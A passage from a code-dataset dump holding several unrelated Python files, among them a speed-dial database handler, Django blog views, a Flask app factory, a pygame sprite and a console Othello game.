body_in):\n\t\tusername = req_dict['username']\n\t\tspeed_dial = req_dict['speed_dial'] # DO NOT SCRUB HERE\n\t\ttelephone_id = req_dict['telephone_number_id']\n\t\tmodify_program = req_dict['modify_program']\n\n\t\ttry:\n\t\t\tself.set_speed_dial(username, speed_dial, telephone_id, modify_program)\n\t\texcept psycopg2.IntegrityError:\n\t\t\thttp.status = 403\n\t\t\tobj = ErrorObject()\n\t\t\tobj.error = \"Invalid Speed Dial Value\"\n\t\t\treturn obj.dumps(SERVICE_ATTRIBUTES)\n\n\t\treturn None\n\n\tdef delete(self, http, req_dict):\n\t\tusername = req_dict['username']\n\t\tspeed_dial = req_dict['speed_dial'] # DO NOT SCRUB HERE\n\n\t\tself.unset_speed_dial(username, speed_dial)\n\t\treturn None\n\n\tdef set_speed_dial(self, username, speed_dial, telephone_number_id, modify_program):\n\t\texisting = self.query_speed_dial(username, speed_dial)\n\t\t#######################\n\t\t### BEGIN DELETE ME ###\n\t\t#######################\n\t\tif existing is None:\n\t\t\texisting = self.legacy_query_speed_dial(username, speed_dial)\n\t\t#####################\n\t\t### END DELETE ME ###\n\t\t#####################\n\n\t\tif not self.confirm_ownership(username, telephone_number_id):\n\t\t\traise 
RestClientError(\"Specified telephone_number_id does not belong to username\")\n\n\t\tif existing is None:\n\t\t\tself.insert_speed_dial(username, speed_dial, telephone_number_id, modify_program)\n\t\telse:\n\t\t\tself.update_speed_dial(username, speed_dial, telephone_number_id, modify_program)\n\n\tdef insert_speed_dial(self, username, speed_dial, telephone_number_id, modify_program):\n\t\tsql = \"\"\"\n\t\t\tinsert into speed_dials (contact_owner_id, speed_dial_number, contact_telephone_number_id, modify_program) \n\t\t\tselect id, %(speed_dial)s, %(tn_id)s, %(modify_program)s from contact_owners where lower(username) = %(username)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower(), 'speed_dial': speed_dial, 'tn_id': telephone_number_id, 'modify_program': modify_program}\n\t\tself.execute_query('contactmanager', sql, params)\n\n\tdef update_speed_dial(self, username, speed_dial, telephone_number_id, modify_program):\n\t\tif (speed_dial == \"\") or (speed_dial is None):\n\t\t unset_speed_dial(username,speed_dial)\n\t\t return\n\t\t\n\t\tsql = \"\"\"\n\t\t\tupdate speed_dials\n\t\t\tset contact_telephone_number_id = %(tn_id)s, modify_program = %(modify_program)s\n\t\t\tfrom contact_owners\n\t\t\twhere lower(contact_owners.username) = %(username)s\n\t\t\tand contact_owners.id = speed_dials.contact_owner_id\n\t\t\tand speed_dial_number = %(speed_dial)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower(), 'speed_dial': speed_dial, 'tn_id': telephone_number_id, 'modify_program': modify_program}\n\t\tself.execute_query('contactmanager', sql, params)\n\t\n\tdef confirm_ownership(self, username, telephone_number_id):\n\t\tsql = \"\"\"\n\t\t\tselect count(*) from contact_telephone_numbers ctn, contact_owners co, contacts c \n\t\t\twhere ctn.contact_id = c.id \n\t\t\tand c.contact_owner_id = co.id\n\t\t\tand lower(co.username) = %(username)s\n\t\t\tand ctn.id = %(telephone_id)s\n\t\t\"\"\"\n\n\t\tparams = {'username': username.lower(), 'telephone_id' : telephone_number_id }\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trow = curs.fetchone()\n\t\treturn (row[0] != 0)\n\n\tdef unset_speed_dial(self, username, speed_dial):\n\t\tsql = \"\"\"\n\t\t\tdelete from speed_dials using contact_owners where contact_owners.username = %(username)s \n\t\t\tand contact_owners.id = speed_dials.contact_owner_id\n\t\t\tand speed_dials.speed_dial_number = %(speed_dial)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower(), 'speed_dial': speed_dial}\t\t\n\n\t\tself.execute_query('contactmanager', sql, params)\n\n\tdef query_speed_dial(self, username, speed_dial):\n\t\tsql = \"\"\"\n\t\t\tselect ctn.display_number, sd.contact_telephone_number_id, sd.speed_dial_number\n\t\t\tfrom contact_owners co, contacts c, contact_telephone_numbers ctn, speed_dials sd\n\t\t\twhere sd.contact_telephone_number_id = ctn.id\n\t\t\tand co.username = %(username)s\n\t\t\tand c.contact_owner_id = co.id\n\t\t\tand ctn.contact_id = c.id\n\t\t\tand sd.contact_owner_id = co.id\n\t\t\tand sd.speed_dial_number = %(speed_dial)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower(), 'speed_dial': speed_dial}\n\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trows = curs.fetchall()\n\n\t\tif len(rows) > 0:\n\t\t\tif len(rows) > 1:\n\t\t\t\tself.log.warn(\"Found more than one speed dial did for username: \" + username + \" and speed dial \" + speed_dial)\n\t\t\trow = rows[0]\n\t\t\tsd_info = ReturnObject()\n\t\t\tsd_info.speed_dial_did = 
phone_format.format_phone(row[0])\n\t\t\tsd_info.contact_telephone_number_id = row[1]\n\t\t\tsd_info.speed_dial_number = row[2]\n\n\t\t\treturn sd_info\n\t\telse:\n\t\t\tself.log.debug(\"No speed dial found for username: \" + username + \" and speed dial \" + speed_dial)\n\t\t\treturn None\n\n\tdef get_summary(self, username):\n\t\t\"\"\"returns all the speed dial number mappings for the given username\"\"\"\n\t\tsql = \"\"\"\n\t\t\tselect ctn.display_number, sd.contact_telephone_number_id, sd.speed_dial_number\n\t\t\tfrom contact_owners co, contacts c, contact_telephone_numbers ctn, speed_dials sd\n\t\t\twhere sd.contact_telephone_number_id = ctn.id\n\t\t\tand co.username = %(username)s\n\t\t\tand c.contact_owner_id = co.id\n\t\t\tand ctn.contact_id = c.id\n\t\t\tand sd.contact_owner_id = co.id\n\t\t\"\"\"\n\n\t\tparams = {'username': username.lower()}\n\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trows = curs.fetchall()\n\n\t\tobj = SpeedDialSummary()\n\n\t\tif rows is None:\n\t\t\treturn obj\n\n\t\tfor row in rows:\n\t\t\tsd_info = ReturnObject()\n\t\t\tsd_info.speed_dial_did = phone_format.format_phone(row[0])\n\t\t\tsd_info.contact_telephone_number_id = row[1]\n\t\t\tsd_info.speed_dial_number = row[2]\n\t\t\tobj.speed_dial.append(sd_info)\n\t\t\n\t\treturn obj\n\n\tdef scrub_speed_dial(self, speed_dial):\n\n\t\t# just use the last 3 digits\n\t\treturn speed_dial[-3:]\n\n\t#######################\n\t### BEGIN DELETE ME ###\n\t#######################\n\n\tdef legacy_query_speed_dial(self, username, speed_dial):\n\t\tsql = \"\"\"\n\t\t\tselect ctn.display_number, ctns.contact_telephone_number_id, ctns.setting_data as speed_dial_number\n\t\t\tfrom contact_telephone_number_settings ctns, contact_telephone_numbers ctn, contacts c, contact_owners co\n\t\t\twhere ctns.setting_type = 'speed_dial'\n\t\t\tand ctn.id = ctns.contact_telephone_number_id\n\t\t\tand c.id = ctn.contact_id\n\t\t\tand co.id = c.contact_owner_id\n\t\t\tand lower(co.username) = %(username)s\n\t\t\tand ctns.setting_data = %(speed_dial)s\n\t\t\"\"\"\n\t\tparams = {'username': username, 'speed_dial': speed_dial}\n\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trows = curs.fetchall()\n\n\t\tif len(rows) > 0:\n\t\t\tif len(rows) > 1:\n\t\t\t\tself.log.warn(\"LEGACY: Found more than one speed dial did for username: \" + username + \" and speed dial \" + speed_dial)\n\n\t\t\trow = rows[0]\n\t\t\tsd_info = ReturnObject()\n\t\t\tsd_info.speed_dial_did = phone_format.format_phone(row[0])\n\t\t\tsd_info.contact_telephone_number_id = row[1]\n\t\t\tsd_info.speed_dial_number = row[2]\n\t\t\treturn sd_info\n\n\t\telse:\n\t\t\tself.log.debug(\"LEGACY: No speed dial found for username: \" + username + \" and speed dial \" + speed_dial)\n\t\t\treturn None\n\n\tdef legacy_get_summary(self, username):\n\t\tsql = \"\"\"\n\t\t\tselect ctn.display_number, ctns.contact_telephone_number_id, ctns.setting_data as speed_dial_number\n\t\t\tfrom contact_telephone_number_settings ctns, contact_telephone_numbers ctn, contacts c, contact_owners co\n\t\t\twhere ctns.setting_type = 'speed_dial'\n\t\t\tand ctn.id = ctns.contact_telephone_number_id\n\t\t\tand c.id = ctn.contact_id\n\t\t\tand co.id = c.contact_owner_id\n\t\t\tand lower(co.username) = %(username)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower()}\n\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trows = curs.fetchall()\n\n\t\tobj = SpeedDialSummary()\n\n\t\tif rows is None:\n\t\t\treturn obj\n\n\t\tfor row in 
rows:\n\t\t\tsd_info = ReturnObject()\n\t\t\tsd_info.speed_dial_did = phone_format.format_phone(row[0])\n\t\t\tsd_info.contact_telephone_number_id = row[1]\n\t\t\tsd_info.speed_dial_number = row[2]\n\t\t\tobj.speed_dial.append(sd_info)\n\n\t\treturn obj\n\n\tdef merge_results(self, current_obj, legacy_obj):\n\t\tobj = SpeedDialSummary()\n\n\t\tif current_obj is not None and current_obj.speed_dial is not None:\n\t\t\tfor sd_info in current_obj.speed_dial:\n\t\t\t\tobj.speed_dial.append(sd_info)\n\n\t\tif legacy_obj is not None and legacy_obj.speed_dial is not None:\n\t\t\tfor sd_info in legacy_obj.speed_dial:\n\t\t\t\tif not self.in_speed_dial_list(sd_info, obj.speed_dial):\n\t\t\t\t\tobj.speed_dial.append(sd_info)\n\n\t\treturn obj\n\n\tdef in_speed_dial_list(self, sd_item, speed_dials):\n\t\tfor speed_dial in speed_dials:\n\t\t\tif str(speed_dial.speed_dial_number) != str(sd_item.speed_dial_number):\n\t\t\t\tcontinue\n\t\t\tif str(speed_dial.speed_dial_did) != str(sd_item.speed_dial_did):\n\t\t\t\tcontinue\n\t\t\tif str(speed_dial.contact_telephone_number_id) != str(sd_item.contact_telephone_number_id):\n\t\t\t\tcontinue\n\t\t\treturn True\n\n\t\treturn False\n\n\t#####################\n\t### END DELETE ME ###\n\t#####################\n\n\tdef routes(self, map, key):\n\n\t\tname = \"speed_dial\"\n\t\troute = \"/dispatcher/%s\" % (name)\n\t\tself.log.debug(\"Adding route \" + str(route) + \" for \" + str(key))\n\t\tmap.connect(route, controller=key)\n\n\t\troute = \"/contact_manager/%s\" % (name)\n\t\tself.log.debug(\"Adding route \" + str(route) + \" for \" + str(key))\n\t\tmap.connect(route, controller=key)\n\n","sub_path":"contact_manager/speed_dial.py","file_name":"speed_dial.py","file_ext":"py","file_size_in_byte":14674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"179421662","text":"import math \n \n \n# function for finding roots \ndef equationroots( a, b, c): \n \n # calculating discriminant using formula \n dis = b * b - 4 * a * c \n sqrt_val = math.sqrt(abs(dis)) \n \n # checking condition for discriminant \n if dis > 0: \n print(\"x1 = \", (-b + sqrt_val)/(2 * a), \", x2 = \",(-b - sqrt_val)/(2 * a)) \n \n elif dis == 0: \n print(\"x = \",-b / (2 * a)) \n \n # when discriminant is less than 0 \n else: \n print(\"NaN\") \n \n\n\ndef Discro(A):\n if len(A) == 3:\n x = A[0]\n y = A[1]\n z = A[2]\n equationroots(x, y, z)\n #return d\n elif len(A) == 6:\n B = A[:len(A)//2]\n #print(B)\n x = B[0]\n y = B[1]\n z = B[2]\n equationroots(x, y, z)\n \n C = A[len(A)//2:]\n print(C)\n x = C[0]\n y = C[1]\n z = C[2]\n equationroots(x, y, z)\n \n #return d1, d2\n \n else:\n print(\"Erreur, Pas de calcul de discriminant\")\n\nif __name__ == '__main__':\n #main()\n SK = [1, -5, 6, 1, 2, 1]\n Discro(SK)\n\n\n\n\n\n\n\n\n\n\n \n","sub_path":"EXO/Discriminant.py","file_name":"Discriminant.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"13101505","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom django_blog.core.forms import PostForm\nfrom django_blog.core.models import Post\n\n\ndef home(request):\n posts = Post.objects.order_by('published_date')\n return render(request, 'index.html', {'posts': posts})\n\n\ndef post_detail(request, pk):\n posts = get_object_or_404(Post, pk=pk)\n return render(request, 'detail_post.html', {'post': posts})\n\n\ndef post_new(request):\n if 
request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n form.full_clean()\n new_post = Post.objects.create(author=request.user)\n post = PostForm(request.POST, instance=new_post)\n post.save()\n return redirect('/')\n else:\n form = PostForm()\n return render(request, 'post_new.html', {'form': form})\n\n\ndef post_edit(request, pk):\n post = get_object_or_404(Post, pk=pk)\n if request.method == 'POST':\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n form.full_clean()\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('/post/' + str(pk) + '/')\n else:\n form = PostForm(instance=post)\n return render(request, 'post_new.html', {'form': form})\n","sub_path":"django_blog/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"491875705","text":"# 题目:请实现一个函数,用来找出字符流中第一个只出现一次的字符。\n# 例如,当从字符流中只读出前两个字符\"go\"时,第一个只出现一次的字符是\"g\";\n# 当从 该字符流中读出前6个字符\"google\"时,第一个只出现一次的字符是\"l\"。\n\n\nclass Solution(object):\n # 返回对应char\n def __init__(self):\n self.s = ''\n self.dic = {}\n\n def FirstAppearingOnce(self):\n # write code here\n for i in self.s:\n if self.dic[i] == 1:\n return i\n return '#'\n\n def Insert(self, char):\n # write code here\n self.s += char\n if char not in self.dic:\n self.dic[char] = 1\n else:\n self.dic[char] += 1\n","sub_path":"50_02字符流中第一个只出现依次的字符.py","file_name":"50_02字符流中第一个只出现依次的字符.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"43450115","text":"# Copyright 2018 Jiří Janoušek \n# Licensed under BSD-2-Clause license - see file LICENSE for details.\n\nfrom typing import Optional\n\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\n\ndef create_thumbnail(input_file: str, output_file: str, width: Optional[int], height: Optional[int]) -> None:\n with open(input_file, 'rb') as fh:\n img = Image.open(fh)\n if width and height:\n img = resizeimage.resize_thumbnail(img, [width, height])\n elif width:\n img = resizeimage.resize_width(img, width)\n elif height:\n img = resizeimage.resize_height(img, height)\n else:\n raise ValueError('Width or height must be specified.')\n img.save(output_file)\n","sub_path":"fxwebgen/imaging.py","file_name":"imaging.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"210155190","text":"\nimport pandas as pd\nimport numpy as np\nimport os\n\n# ---------------------------------------------------------------------\n# Homework 4: see hw/hw02/hw02.ipynb for question prompt\n# ---------------------------------------------------------------------\n\n\ndef join_purch_visit(purch, webvisits):\n \"\"\"\n approximately joins the purchases and webvisits data according\n to the condition specified in the HW.\n\n :Example:\n >>> fpurch = os.path.join('data', 'hw04', 'purch.csv')\n >>> fweb = os.path.join('data', 'hw04', 'webvisits.csv')\n >>> purch, webvisits = pd.read_csv(fpurch), pd.read_csv(fweb)\n >>> joined = join_purch_visit(purch, webvisits)\n >>> joined['email'].nunique() == len(joined)\n True\n \"\"\"\n return ...\n\n\ndef revenue_by_url(joined):\n \"\"\"\n Returns the revenue of each ad-campaign (web visit)\n\n :Example:\n >>> fpurch = os.path.join('data', 'hw04', 'purch.csv')\n >>> fweb = 
os.path.join('data', 'hw04', 'webvisits.csv')\n >>> purch, webvisits = pd.read_csv(fpurch), pd.read_csv(fweb)\n >>> joined = join_purch_visit(purch, webvisits)\n >>> out = revenue_by_url(joined)\n >>> isinstance(out, pd.Series)\n True\n >>> isinstance(out.iloc[0], float)\n True\n \"\"\"\n\n return ...\n\n# ---------------------------------------------------------------------\n# DO NOT TOUCH BELOW THIS LINE\n# IT'S FOR YOUR OWN BENEFIT!\n# ---------------------------------------------------------------------\n\n\n# Graded functions names! DO NOT CHANGE!\n# This dictionary provides your doctests with\n# a check that all of the questions being graded\n# exist in your code!\n\nGRADED_FUNCTIONS = {\n 'q01': ['join_purch_visit', 'revenue_by_url']\n}\n\n\ndef check_for_graded_elements():\n \"\"\"\n >>> check_for_graded_elements()\n True\n \"\"\"\n \n for q, elts in GRADED_FUNCTIONS.items():\n for elt in elts:\n if elt not in globals():\n stmt = \"YOU CHANGED A QUESTION THAT SHOULDN'T CHANGE! \\\n In %s, part %s is missing\" %(q, elt)\n raise Exception(stmt)\n\n return True\n\n","sub_path":"extra-credit/ec_hw04.py","file_name":"ec_hw04.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"495419556","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image\nimage = Image.open('img/lwt.jpg')\n\ndef binarize_image(image):\n pixels = image.load()\n # image.show()\n for x in range(image.width):\n for y in range(image.height):\n if pixels[x,y][0] < 20 or pixels[x,y] < 20 or pixels[x,y][2] < 20:\n pixels[x,y] = (0,0,0,225)\n else:\n pixels[x,y] = (225,225,225,225)\n return image\n\n# binarize_image(image).show()\n","sub_path":"pic_proc.py","file_name":"pic_proc.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"153069395","text":"import pygame\nimport random\n\nfrom pygame.locals import (\n RLEACCEL,\n)\nfrom invasion.settings import Settings\n\n\nclass Terminator(pygame.sprite.Sprite):\n \"\"\"\n Define the cloud object extending pygame.sprite.Sprite\n Use an image for a better looking sprite\n \"\"\"\n\n def __init__(self):\n super(Terminator, self).__init__()\n self.settings = Settings()\n self.surf = pygame.image.load(self.settings.IMG_TERMINATOR).convert_alpha()\n #self.surf.set_colorkey((0,0,0), RLEACCEL)\n # The starting position is randomly generated\n x = random.randint(int(self.settings.SCREEN_WIDTH/4) + 20, self.settings.SCREEN_WIDTH + 100)\n y = random.randint(0, self.settings.SCREEN_HEIGHT)\n self.rect = self.surf.get_rect(\n center=(x, y)\n )\n\n\n def update(self):\n \"\"\"\n Move the ship based on a constant speed\n Remove it when it passes the left edge of the screen\n \"\"\"\n self.rect.move_ip(-5, 0)\n if self.rect.right < 0:\n self.kill()\n\n","sub_path":"invasion/terminator.py","file_name":"terminator.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"367460957","text":"# -*- coding: UTF-8 -*-\r\nfrom flask import Flask\r\nfrom config import load_config\r\n\r\nimport os\r\nfrom .extensions import db, api_ins, bootstrap, mail, moment, \\\r\n login_manager, admin, pagedown, db_mongo, ListConverter\r\n\r\n\r\ndef create_app(config=None):\r\n app = Flask(__name__)\r\n config = load_config(config)\r\n app.config.from_object(config)\r\n config.init_app(app)\r\n\r\n os.makedirs(app.config['REPO_DIR'], 
exist_ok=True)\r\n    os.makedirs(app.config['REPO_CLONE_DIR'], exist_ok=True)\r\n\r\n    bootstrap.init_app(app)\r\n    mail.init_app(app)\r\n    moment.init_app(app)\r\n    db.init_app(app)\r\n    login_manager.init_app(app)\r\n    pagedown.init_app(app)\r\n    admin.init_app(app)\r\n    db_mongo.init_app(app)\r\n\r\n    app.url_map.converters['list'] = ListConverter\r\n\r\n    from .main import main as main_blueprint\r\n    app.register_blueprint(main_blueprint)\r\n\r\n    from .auth import auth as auth_blueprint\r\n    app.register_blueprint(auth_blueprint, url_prefix='/auth')\r\n\r\n    from .api import api as api_blueprint\r\n    app.register_blueprint(api_blueprint, url_prefix='/api/v1')\r\n\r\n    from .analytics import analyze as analytics_blueprint\r\n    app.register_blueprint(analytics_blueprint, url_prefix='/analytics')\r\n\r\n    from .gitserver import gitserver as gitserver_blueprint\r\n    app.register_blueprint(gitserver_blueprint)\r\n\r\n    api_ins.init_app(app)\r\n\r\n    return app\r\n","sub_path":"leiter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"348212671","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport math\nimport re\n\ndirections = (\n\t\t(-1, -1), (-1, 0), (-1, +1),\n\t\t( 0, -1), ( 0, +1),\n\t\t(+1, -1), (+1, 0), (+1, +1),\n)\n\n\nclass State(object):\n\tdef __init__(self):\n\t\tself.kernel = [0] * 64\n\t\tself.kernel[State.rc2pos(3, 3)] = +1\n\t\tself.kernel[State.rc2pos(3, 4)] = -1\n\t\tself.kernel[State.rc2pos(4, 3)] = -1\n\t\tself.kernel[State.rc2pos(4, 4)] = +1\n\t\tself.update_moves()\n\n\tdef get_standing(self):\n\t\treturn sum(self.kernel)\n\n\t@staticmethod\n\tdef adjacent_pos(pos, r_delta, c_delta):\n\t\tr, c = State.pos2rc(pos)\n\n\t\tr += r_delta\n\t\tc += c_delta\n\n\t\treturn State.rc2pos(r, c)\n\n\t@staticmethod\n\tdef adjacents(pos, r_delta, c_delta):\n\t\twhile True:\n\t\t\tpos = State.adjacent_pos(pos, r_delta, c_delta)\n\t\t\tif pos is None:\n\t\t\t\treturn\n\t\t\tyield pos\n\n\t@staticmethod\n\tdef pos2rc(pos):\n\t\treturn (int(pos / 8), int(pos % 8))\n\n\t@staticmethod\n\tdef rc2pos(r, c):\n\t\tif r < 0 or r >= 8:\n\t\t\treturn None\n\t\tif c < 0 or c >= 8:\n\t\t\treturn None\n\t\treturn int(r * 8 + c)\n\n\tdef get_pos_value(self, pos):\n\t\treturn self.kernel[pos]\n\n\tdef find_non_value(self, pos, value, direction):\n\t\tfor pos in State.adjacents(pos, *direction):\n\t\t\tif self.get_pos_value(pos) != value:\n\t\t\t\treturn pos\n\t\treturn None\n\n\tdef find_pair_pos(self, pos, colour, direction, occupied):\n\t\tadjacent = self.adjacent_pos(pos, *direction)\n\t\tif adjacent is None:  # off the board\n\t\t\treturn None\n\t\tif self.get_pos_value(adjacent) != -colour:\n\t\t\treturn None\n\t\tcandidate = self.find_non_value(adjacent, -colour, direction)\n\t\tif candidate is None:\n\t\t\treturn None\n\t\tif self.get_pos_value(candidate) != (colour if occupied else 0):\n\t\t\treturn None\n\t\treturn candidate\n\n\n\tdef possible_moves(self, for_v):\n\t\tmoves = set()\n\t\tfor pos in range(64):\n\t\t\tif self.kernel[pos] == for_v:\n\t\t\t\tfor direction in directions:\n\t\t\t\t\tcandidate = self.find_pair_pos(pos, for_v, direction, False)\n\t\t\t\t\tif candidate is not None:\n\t\t\t\t\t\tmoves.add(candidate)\n\t\treturn moves\n\n\tdef update_colours(self, origin):\n\t\tcolour = self.get_pos_value(origin)\n\t\tfor direction in directions:\n\t\t\tpair = self.find_pair_pos(origin, colour, direction, True)\n\t\t\tif pair is None:\n\t\t\t\tcontinue\n\t\t\tfor adjacent in State.adjacents(origin, 
*direction):\n\t\t\t\tif adjacent == pair:\n\t\t\t\t\tbreak\n\t\t\t\tself.kernel[adjacent] = colour\n\n\tdef update_moves(self):\n\t\tself.black_moves = self.possible_moves(+1)\n\t\tself.white_moves = self.possible_moves(-1)\n\n\tdef get_moves(self, for_v):\n\t\tif for_v == +1:\n\t\t\treturn self.black_moves\n\t\tif for_v == -1:\n\t\t\treturn self.white_moves\n\t\traise RuntimeError(\"unsupported\")\n\n\n\tdef mutate(self, r, c, for_v):\n\t\tpos = State.rc2pos(r, c)\n\t\tif pos is None:\n\t\t\traise RuntimeError(\"bad pos\")\n\t\tif pos not in self.get_moves(for_v):\n\t\t\traise RuntimeError(\"bad move\")\n\n\t\tself.kernel[pos] = for_v\n\t\tself.update_colours(pos)\n\t\tself.update_moves()\n\n\t@staticmethod\n\tdef v2xo(v):\n\t\tif v == +1:\n\t\t\treturn 'x'\n\t\tif v == -1:\n\t\t\treturn 'o'\n\t\treturn None\n\n\tdef print(self, f):\n\t\tf.write(' |')\n\t\tfor c in range(8):\n\t\t\tf.write('%s|' % chr(ord('a') + c))\n\t\tf.write('\\n')\n\t\tfor r in range(8):\n\t\t\tf.write('%s|' % chr(ord('1') + r))\n\t\t\tfor c in range(8):\n\t\t\t\tv = self.get_pos_value(State.rc2pos(r, c))\n\t\t\t\txo = State.v2xo(v) if v else '_'\n\t\t\t\tf.write('%s|' % xo)\n\t\t\tf.write('\\n')\n\nstate = State()\n\nturn = +1\nwhile True:\n\ttry:\n\t\tstate.print(sys.stdout)\n\t\tsys.stdout.write('\\n')\n\n\t\tif not state.get_moves(turn):\n\t\t\tsys.stdout.write('%s passes\\n' % State.v2xo(turn))\n\t\t\tturn = -turn\n\t\t\tif not state.get_moves(turn):\n\t\t\t\tsys.stdout.write('%s passes\\n' % State.v2xo(turn))\n\t\t\t\tstanding = state.get_standing()\n\t\t\t\tif standing:\n\t\t\t\t\t# the winner is the colour with more discs; copysign reduces the score to +/-1\n\t\t\t\t\tsys.stdout.write('%s wins\\n' % State.v2xo(int(math.copysign(1, standing))))\n\t\t\t\telse:\n\t\t\t\t\tsys.stdout.write('it\\'s a draw\\n')\n\t\t\t\tbreak\n\n\t\twhile True:\n\t\t\trc = input(\"%s's turn to move: \" % State.v2xo(turn))\n\t\t\ttry:\n\t\t\t\tr = ord(next(re.finditer('[1-8]', rc)).group(0)) - ord('1')\n\t\t\t\tc = ord(next(re.finditer('[a-h]', rc)).group(0)) - ord('a')\n\t\t\t\tbreak\n\t\t\texcept StopIteration:\n\t\t\t\tpass\n\n\t\tstate.mutate(r, c, turn)\n\t\tturn = -turn\n\texcept RuntimeError as e:\n\t\tprint(e)\n\t\tsys.stdout.write('\\n')\n","sub_path":"othello.py","file_name":"othello.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"377346605","text":"from __future__ import print_function\nimport tensorflow as tf\nimport argparse\nfrom antk.core import config\nfrom antk.core import generic_model\nfrom antk.core import loader\nfrom antk.models import tree_model\n\ndef return_parser():\n    parser = argparse.ArgumentParser(description=\"For testing\")\n    parser.add_argument(\"datadir\", metavar=\"DATA_DIRECTORY\", type=str,\n                        help=\"The directory where train, dev, and test data resides. 
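It is expected to contain the 'train', 'test', 'dev', 'user' and 'item' subdirectories used by loader.read_data_sets below. 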
\")\n parser.add_argument(\"config\", metavar=\"CONFIG\", type=str,\n help=\"The config file for building the ant architecture.\")\n parser.add_argument(\"-initrange\", metavar=\"INITRANGE\", type=float, default=0.00001,\n help=\"A value determining the initial size of the weights.\")\n parser.add_argument(\"-kfactors\", metavar=\"KFACTORS\", type=int, default=20,\n help=\"The rank of the low rank factorization.\")\n parser.add_argument(\"-lamb\", metavar=\"LAMBDA\", type=float, default=0.01,\n help=\"The coefficient for l2 regularization\")\n parser.add_argument(\"-mb\", metavar=\"MINIBATCH\", type=int, default=500,\n help=\"The size of minibatches for stochastic gradient descent.\")\n parser.add_argument(\"-learnrate\", metavar=\"LEARNRATE\", type=float, default=0.00001,\n help=\"The stepsize for gradient descent.\")\n parser.add_argument(\"-verbose\", metavar=\"VERBOSE\", type=bool, default=True,\n help=\"Whether or not to print dev evaluations during training.\")\n parser.add_argument(\"-maxbadcount\", metavar=\"MAXBADCOUNT\", type=int, default=20,\n help=\"The threshold for early stopping.\")\n parser.add_argument(\"-epochs\", metavar=\"EPOCHS\", type=int, default=100,\n help=\"The maximum number of epochs to train for.\")\n parser.add_argument(\"-random_seed\", metavar=\"RANDOM_SEED\", type=int, default=500,\n help=\"For reproducible results.\")\n parser.add_argument(\"-eval_rate\", metavar=\"EVAL_RATE\", type=int, default=500,\n help=\"How often (in terms of number of data points) to evaluate on dev.\")\n return parser\n\nif __name__ == '__main__':\n\n args = return_parser().parse_args()\n\n data = loader.read_data_sets(args.datadir, folders=['train', 'test', 'dev', 'user', 'item'], mix=False)\n data.train.labels['ratings'] = loader.center(data.train.labels['ratings'], axis=None)\n data.dev.labels['ratings'] = loader.center(data.dev.labels['ratings'], axis=None)\n data.user.features['age'] = loader.center(data.user.features['age'], axis=None)\n data.item.features['year'] = loader.center(data.item.features['year'], axis=None)\n data.user.features['age'] = loader.maxnormalize(data.user.features['age'])\n data.item.features['year'] = loader.maxnormalize(data.item.features['year'])\n\n x = tree_model.tree(data, args.config,\n initrange=args.initrange,\n kfactors=args.kfactors,\n lamb =args.lamb,\n mb=args.mb,\n learnrate=args.learnrate,\n verbose=args.verbose,\n maxbadcount=args.maxbadcount,\n epochs=args.epochs,\n random_seed=args.random_seed,\n eval_rate=args.eval_rate)\n #print stuff here to file.\n","sub_path":"test/modelwrappers/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"297832717","text":"import matplotlib.pyplot as plt\nimport cv2\nimport os\nimport random\nimport math\nimport shutil\nimport numpy as np\nfrom xml.etree.ElementTree import Element, SubElement, ElementTree, dump\n\n'''\nInput:\n - character image files classified with different folders\n (ex: image files of phd08 dataset)\n - background image files\n (ex: DTD dataset, https://www.robots.ox.ac.uk/~vgg/data/dtd/)\n\nOutput:\n - synthetic images (character images patched on background images)\n - annotation (xml with labels, positions and sizes)\n - txt files (train / validation / test set splitted)\n\nUsage:\n 1) Download phd08 dataset (https://drive.google.com/drive/folders/0B-u3H0N7Z4OueFgtRDZCRmtmeFk)\n 2) Download background image dataset\n 3) Download phd08_to_image.py 
